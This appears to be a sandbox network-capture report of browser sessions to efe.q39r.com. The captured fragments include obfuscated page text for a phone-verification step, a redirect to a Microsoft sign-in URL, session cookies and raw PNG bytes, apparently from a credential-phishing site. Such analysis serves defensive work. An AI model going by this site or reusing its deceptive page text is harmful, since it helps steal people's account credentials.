                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 74 70 72 6f 74 65 63 74 6f 70 74 69 6f 6e 28 74 68 69 73 29 27 2c 27 3c 70 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6d 62 2d 31 36 5c 78 32 32 3e 27 2c 27 62 6c 61 6e 6b 27 2c 27 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 74 65 78 74 2d 62 6c 6f 63 6b 2d 62 6f 64 79 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 45 6e 74 65 72 50 72 6f 6f 66 44 65 73 63 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 54 6f 5c 78 32 30 76 65 72 69 66 79 5c 78 32 30 74 68 61 74 5c 78 32 30 74 68 69 73 5c 78 32 30 69 73 5c 78 32 30 79 6f 75 72 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 2c 5c
                                                                                  Data Ascii: tprotectoption(this)','<p\x20class=\x22mb-16\x22>','blank','\x0a\x20\x20\x20\x20\x20\x20<div\x20class=\x22text-block-body\x22\x20id=\x22iEnterProofDesc\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20To\x20verify\x20that\x20this\x20is\x20your\x20phone\x20number,\
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 73 65 27 2c 27 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 27 2c 27 2c 5c 78 32 30 61 6e 64 5c 78 32 30 74 68 65 6e 5c 78 32 30 63 6c 69 63 6b 5c 78 32 30 5c 78 32 32 53 65 6e 64 5c 78 32 30 63 6f 64 65 5c 78 32 32 5c 78 32 30 74 6f 5c 78 32 30 72 65 63 65 69 76 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 63 6f 64 65 2e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 72 6f 6c 65 3d 5c 78 32 32 61 6c 65 72 74 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 6c 69 76 65 3d 5c 78 32 32 61 73 73 65 72 74 69 76 65 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                                                  Data Ascii: se','iProofInputError',',\x20and\x20then\x20click\x20\x22Send\x20code\x22\x20to\x20receive\x20your\x20code.\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20<div\x20role=\x22alert\x22\x20aria-live=\x22assertive\x22>\x0a\x20\x20\x20\x20\x20\x20


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.1749756172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:33 UTC1277OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: Upgrade
                                                                                  Pragma: no-cache
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Upgrade: websocket
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-WebSocket-Version: 13
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  Sec-WebSocket-Key: auTwnBOXmEbtU7werxzLsA==
                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                  2024-04-25 16:23:34 UTC569INHTTP/1.1 400 Bad Request
                                                                                  Date: Thu, 25 Apr 2024 16:23:34 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdBqCCKiLMdCsVbT9o2e9DrzG9lsl9iU04t3CtpOp7GVZGQB1AHIfykKQx94JwjJlIJ57qArgjApBkl%2F7n%2BagQmSd6esjwaU5t17UWrQzPjo3nU9RKfR2BefQd7jaA8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada57b0c53e8-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:34 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                  Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                  2024-04-25 16:23:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.1749757172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:33 UTC1558OUTPOST /ajNyX2SU9rhFeYXrhcFSd76xsstnihCYYJkPQp8lDwn8pe HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 32
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                  X-Requested-With: XMLHttpRequest
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:33 UTC32OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 4b 35 4c 79 38 51 6d 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                                                                                  Data Ascii: pagelink=K5Ly8Qm&type=4&appnum=1
                                                                                  2024-04-25 16:23:34 UTC997INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:34 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, private
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOFjcB4C2KTvAlUGNKtnruNpVWNDPJLMlOEpX3t6O2yR9fDS70DsYhVxIE%2B4AA7htKAw6rdvTxxoPRoK00K8UPg2dqNt0ErOGB3XwDhFeZFo%2Fyf5Hu0iAzKCti%2BdTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; expires=Thu, 25-Apr-2024 18:23:34 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                  2024-04-25 16:23:34 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 4e 6f 54 45 52 77 4b 79 39 43 55 46 42 74 57 46 4e 49 56 45 52 74 5a 32 5a 76 4e 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 32 74 4d 52 30 59 77 54 55 39 78 52 46 6f 79 62 6d 39 61 57 6d 39 46 4e 33 67 30 54 56 70 44 4f 47 4a 44 5a 30 67 78 62 6c 4a 46 54 30 70 45 52 46 6f 32 4d 55 46 69 55 31 4d 72 4d 6c 70 31 54 32 31 58 52 6c 4e 56 55 58 4e 6e 59 54 6c 70 64 47 4e 4b 55 55 46 34 62 6b 63 31 64 33 42 70 52 79 74 47 4b 30 68 42 56 47 64 77 5a 32 4a 6d 63 30 56 73 4e 30 74 48 54 57 35 70 5a 46 68 35 55 6a 4e 75 5a 30 4a 44 61 56 46 4b 51 58 56 4d 63 54 42 33 53 46 4e 72 4e 45 52 71 4d 31 52 73 54 6a 6c 47 65 6a 67 35 54 47 73
                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGs
                                                                                  2024-04-25 16:23:34 UTC97INData Raw: 35 62 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 5c 2f 63 6f 6d 6d 6f 6e 5c 2f 53 41 53 5c 2f 50 72 6f 63 65 73 73 41 75 74 68 22 7d 0d 0a
                                                                                  Data Ascii: 5b{"expired":0,"redirecturl":"https:\/\/login.microsoftonline.com\/common\/SAS\/ProcessAuth"}
                                                                                  2024-04-25 16:23:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.1749758172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:33 UTC1530OUTGET /pqlrdvXLDxx8n6V4MJcB2ydokZwphsRQHgstygzowxnkE7IJ6fkdR23LED0BEqORerGVIm4SyEOoIaiiUvfdh4OuMUbyF2Lroiop420 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:34 UTC697INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:34 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 79750
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="pqlrdvXLDxx8n6V4MJcB2ydokZwphsRQHgstygzowxnkE7IJ6fkdR23LED0BEqORerGVIm4SyEOoIaiiUvfdh4OuMUbyF2Lroiop420"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xgHvnzeqwkyB5T1RM4s8phnXChlbDxEk562bSnCLBHuvcrmgtsDCFkamqxPzIMAU%2B4dn74sbOzS6sF%2BeVEWTS6D1qLDBCchdKYKdQleNG%2FzAzVySU8O2c4an3n5H8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada5588eb0b7-ATL
                                                                                  2024-04-25 16:23:34 UTC672INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 5b 00 00 02 bc 08 02 00 00 00 bf 53 27 5f 00 00 01 00 69 43 43 50 69 63 63 00 00 18 95 63 60 60 3c c1 00 04 2c 06 0c 0c b9 79 25 45 41 ee 4e 0a 11 91 51 0a ec 0f 18 18 81 10 0c 12 93 8b 0b 18 70 03 a0 aa 6f d7 20 6a 2f eb e2 51 87 0b 70 a6 a4 16 27 03 e9 0f 40 ac 52 04 b4 1c 68 a4 08 90 2d 92 0e 61 6b 80 d8 49 10 b6 0d 88 5d 5e 52 50 02 64 07 80 d8 45 21 41 ce 40 76 0a 90 ad 91 8e c4 4e 42 62 27 17 14 81 d4 f7 00 d9 36 b9 39 a5 c9 08 77 33 f0 a4 e6 85 06 03 69 0e 20 96 61 28 66 08 62 70 67 70 02 f9 1f a2 24 7f 11 03 83 c5 57 06 06 e6 09 08 b1 a4 99 0c 0c db 5b 19 18 24 6e 21 c4 54 16 30 30 f0 b7 30 30 6c 3b 8f 10 43 84 49 41 62 51 22 58 88 05 88 99 d2 d2 18 18 3e 2d 67 60 e0 8d 64 60 10 be c0 c0 c0
                                                                                  Data Ascii: PNGIHDR[S'_iCCPiccc``<,y%EANQpo j/Qp'@Rh-akI]^RPdE!A@vNBb'69w3i a(fbpgp$W[$n!T0000l;CIAbQ"X>-g`d`
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: e3 d1 63 e4 9f ca 43 4e 4e 1a fe 01 88 5e be 67 03 28 16 0a 00 00 00 01 6f 72 4e 54 01 cf a2 77 9a 00 00 80 00 49 44 41 54 78 da ec fd ed 72 1d d9 b1 35 ea 8d 91 39 ab 16 c0 6e bd 3e 61 47 d8 61 5f a5 af d1 77 74 5e 75 03 ab 6a ce cc e1 1f 59 0b 00 c9 6e 49 2d 69 1f a9 89 7c b6 02 9b 44 83 e0 fa 04 67 56 7e d1 ff bf ff 3f bc 23 00 11 00 8c e3 ed d7 0f 06 20 99 f8 77 90 f4 9b 9f 27 f9 87 be 8f e9 0f 7d 79 6b 9f 5a 20 86 f1 c9 f3 e7 dd ff d7 86 ff fb b3 fd 3f ff d7 fe ff fa c9 ff 3f ff c7 97 ff d7 5f c6 ff fb ff 78 fe 7f 7c f1 ff db cd fe d7 f3 f6 97 a7 b1 1b 37 27 fb 2d d6 5a 6b ad b5 7f 87 7f d7 f9 ff 6f 7c ff 8f df 4a 52 fd 8d 99 59 bf ae 5f bc dd 12 77 b7 f2 9f 7e 64 5a 6b ad b5 d6 5a 6b ed 3f 66 fc de 7f b8 e2 a7 af 3f 07 40 f8 9f bd 62 fc 7b b1 e3 ef
                                                                                  Data Ascii: cCNN^g(orNTwIDATxr59n>aGa_wt^ujYnI-i|DgV~?# w'}ykZ ??_x|7'-Zko|JRY_w~dZkZk?f?@b{
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 6b ed 3f af e6 f1 93 24 a9 07 5a 5f 31 69 ad b5 d6 da 9f 06 c9 b7 8f 1f d5 39 e7 6f 7c 7d 9f 78 5a 6b ad b5 d6 5a 6b 9f 57 47 44 ad b5 d6 5a 6b ad b5 4f e7 2d 77 d4 11 51 6b ad b5 d6 5a 6b ed 93 92 d4 11 51 6b ad b5 d6 5a 6b ed 33 aa 34 51 47 44 ad b5 d6 5a 6b ad b5 4f a7 ab e6 5a 6b ad b5 d6 5a 6b ad 23 a2 d6 5a 6b ad b5 d6 da 67 25 a9 f7 11 b5 d6 5a 6b ad b5 d6 7e 04 b5 53 11 1f b6 12 65 e6 ef 7d b1 99 d5 32 c6 ce 11 b5 d6 5a 6b ad b5 d6 3e af 8e 88 5a 6b ad b5 d6 5a 6b 9f 57 47 44 ad b5 d6 5a 6b ad b5 cf ab 23 a2 d6 5a 6b ad b5 d6 da e7 d5 11 51 6b ad b5 d6 5a 6b ed f3 ea 88 a8 b5 d6 5a 6b ad b5 f6 79 75 44 d4 5a 6b ad b5 d6 5a fb bc 3a 22 6a ad 5d 33 fb 6b 84 3f 1f 6a 9c 7f 6b ad b5 d6 da 8f ad 23 a2 d6 5a 6b ad b5 d6 da e7 d5 11 51 6b ad b5 d6 5a 6b
                                                                                  Data Ascii: k?$Z_1i9o|}xZkZkWGDZkO-wQkZkQkZk34QGDZkOZkZk#Zkg%Zk~Se}2Zk>ZkZkWGDZk#ZkQkZkZkyuDZkZ:"j]3k?jk#ZkQkZk
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 88 5a 6b ed 73 4a be 27 85 12 bf 93 1a fa e6 e3 9f da 3f 1e 0e fd 20 f7 f7 9b e7 f4 1f f8 d8 5a 6b 9f 53 e7 88 5a 6b ad e1 37 7a 8a ae c9 63 5f 55 ca fd a1 cc c9 7f 5f 50 f1 47 2f 02 fe b9 ab 04 f1 47 67 c7 75 54 d4 5a fb ac 3a 47 d4 5a 6b ed ef fb 31 aa c8 5a 6b ad b5 ef 75 8e a8 b5 d6 3e 05 e9 9b 94 8d 1e 9f ae 5f bc 67 84 8c e3 bb 3f 62 02 f8 48 fa 90 7c fb 08 20 f3 cf 91 4b f9 ee 11 b8 ee c2 37 9f 27 79 dd 35 f2 fb 3f 22 e9 ed 8e ff 97 fb 78 3b bf bf 23 bf f1 c9 3f c9 fd fa ef f4 af bc 2a 7e f3 d9 69 ad fd 1b 7d ff 73 fe 9b cf 74 44 d4 5a 6b 9f c2 77 e7 63 03 05 d2 e4 7a cc 4e 20 20 18 41 11 48 c1 48 3d 16 f5 12 89 84 7e e3 1f 92 3f 8b 4a 73 19 58 f7 48 04 04 11 46 4b a8 3e 43 01 46 08 30 2a 7f e3 6e fe 59 c2 21 00 09 e1 31 25 82 c0 db 7d 7c 7b 04 60
                                                                                  Data Ascii: ZksJ'? ZkSZk7zc_U_PG/GguTZ:GZk1Zku>_g?bH| K7'y5?"x;#?*~i}stDZkwczN AHH=~?JsXHFK>CF0*nY!1%}|{`
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 8f af 4c 81 7a 7f 55 5a 20 23 22 33 21 ae 8c 80 e0 96 b4 cc 24 b9 bb 85 b0 01 9b 39 4c 29 25 f2 6a 5f c3 c0 e3 e2 82 7d f7 ee f8 18 96 d4 ab e8 ef 1e fa bf ff f9 00 d4 03 71 a5 3a 2b 6d f8 f6 8c c7 d7 95 a2 7c 30 5d 79 51 b7 fa 83 f1 e1 75 6b 8f 57 a9 d9 77 8f cf f7 ef 02 be b7 23 9a be 7a 8c df 83 d5 c7 7b 24 3f fc b7 4c 59 da 87 38 ed fa 6e 1f bf 1e 5f 7d 3d be 0a ea ea fb ff ee 23 a6 fa 99 d4 41 d1 8f ec 9b f4 fe f7 57 bb 3a 22 6a ad b5 1f d1 87 70 28 22 12 0c 71 01 89 5c a1 19 5a a9 19 11 52 fd 76 2e 4d 20 e5 21 65 9d ae 05 20 9d 32 33 37 6c 80 43 2b 31 a4 7d 68 c8 36 87 a7 92 74 6a a4 cc de 22 22 5c 43 0a ea ca 37 1f e7 ac df 4f 9e d4 f9 fe 71 2e c1 df ba 8c fd b1 15 ea bb 86 0d 82 f9 98 0b 01 f1 63 28 22 a0 6a c7 32 15 ca 95 38 23 ef 67 1e e2 62 ae
                                                                                  Data Ascii: LzUZ #"3!$9L)%j_}q:+m|0]yQukWw#z{$?LY8n_}=#AW:"jp("q\ZRv.M !e 237lC+1}h6tj""\C7Oq.c("j28#gb
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: dc 37 6c e6 03 99 4e 23 88 2a 10 d5 6f df aa eb f9 b1 eb b1 fa f0 1e f9 ee 17 5f fd b6 ba e0 fe ee 3d fd 07 de 4d ad fd f3 24 75 44 d4 5a 6b 3f 08 be 5f 8b 45 c2 24 2d 30 85 05 2c d9 91 79 ac bc 2f 1d 67 bc 9e eb 8c fc e5 cc 15 3a 57 ac 99 67 ac 2a 1c 4a 58 c4 fb 26 56 07 69 aa e1 09 cf db 70 c3 3e 39 86 3d 0d 3c dd ec 4b 62 ba 9e 12 e1 57 1e 60 33 81 b5 fb 87 94 7e 67 c5 4d f5 f9 fc e6 5d f8 3b 3e 66 87 ea ab 03 8a c4 52 46 c5 5f 8f 03 9f d3 cc 35 40 f0 fa a7 4e b0 c4 aa e9 db 2b 74 ce 7c 9d f9 ba e2 65 45 28 cd 10 e2 40 90 dc 07 b7 e4 9e 18 d5 cf 02 92 fc 50 82 7e c5 1e f9 16 10 bc 5d b7 66 7e 3c c9 1a 2c 7f 3b fc 7b 3b ff 7d d5 17 f1 d5 57 5c 9d 42 f9 a8 14 7a 3f 32 26 ea 6f c9 b7 49 05 75 f7 6a 3a 82 49 75 1f 13 b6 94 2b 78 5f ab 12 62 c7 5c a1 74 32
                                                                                  Data Ascii: 7lN#*o_=M$uDZk?_E$-0,y/g:Wg*JX&Vip>9=<KbW`3~gM];>fRF_5@N+t|eE(@P~]f~<,;{;}W\Bz?2&oIuj:Iu+x_b\t2
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 3c 36 e2 e7 9b cf c1 05 83 6d 64 38 cd 58 c3 0d aa 87 cd f0 fe 9e bd 1e 9f df 19 7d fe 7d 29 dd ef bc ce 99 1f be db f5 f9 f7 86 36 7d f7 16 f8 f0 ae f9 aa 81 4f 86 df 1f c7 f7 fb c3 c4 7b ca c2 a7 d6 11 51 6b ad fd 18 de 47 14 48 0a 58 40 0b 9c e2 31 f3 25 f2 65 e5 af f7 f8 f5 88 97 33 8f 19 67 f0 3e 15 f2 48 65 c2 01 af 4d ac a8 74 49 f5 c6 40 82 a0 aa 08 3a 22 98 24 d3 93 51 53 04 4c 29 99 01 c8 cd 6c 33 d5 d9 b6 ea 67 dc b6 6b 4b 09 ab f7 e0 9f bf 66 5b a3 93 6b 3e 59 20 99 4c 32 32 26 b4 42 67 f2 1e 39 43 33 90 12 60 6e 58 ae a0 60 c6 10 3c 4d ac ca ba 50 4e 61 0a 67 f2 4c 9e 89 33 b1 04 43 ce e0 4c 45 32 b2 0a b7 ea 84 44 a1 e6 80 05 e9 35 03 fa 71 bb 0c fc 90 a2 79 3f e2 7d a8 9b fb 9d 89 dc 7f f3 89 7c df e1 f3 ee 6a ba f9 76 b9 8d be 79 60 65 90
                                                                                  Data Ascii: <6md8X}})6}O{QkGHX@1%e3g>HeMtI@:"$QSL)l3gkKf[k>Y L22&Bg9C3`nX`<MPNagL3CLE2D5qy?}|jvy`e
